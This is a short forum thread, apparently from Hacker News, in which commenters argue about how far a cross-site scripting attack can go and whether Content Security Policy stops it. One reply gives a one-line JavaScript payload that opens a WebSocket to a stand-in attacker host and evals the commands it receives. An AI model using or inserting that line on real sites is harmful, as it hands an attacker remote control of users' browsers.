Show me where you can "open a tunnel" using the XSS in this post.

> Anything the user can do, you can do via an XSS attack.

I just explained why this isn't a reasonable assumption. You seem to have multiple fundamental misunderstandings about web application security so I don't think it's constructive for either of us to continue this conversation.

▲ llmslave2 13 hours ago | parent [-]

> Show me where you can "open a tunnel" using the XSS in this post.

   new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))

> You seem to have multiple fundamental misunderstandings about web application security

Lol yeah sure buddy

▲

rainonmoon 12 hours ago | parent [-]

Go to Discord and paste that into your console. None of us will hold it against you if you come back and delete these comments once you learn about Content Security Policy.

	▲	llmslave2 11 hours ago \| parent [-]
		Maybe you should read up on what CSP can and can't do. Once an attacker can execute arbitrary code, they can do anything the client can.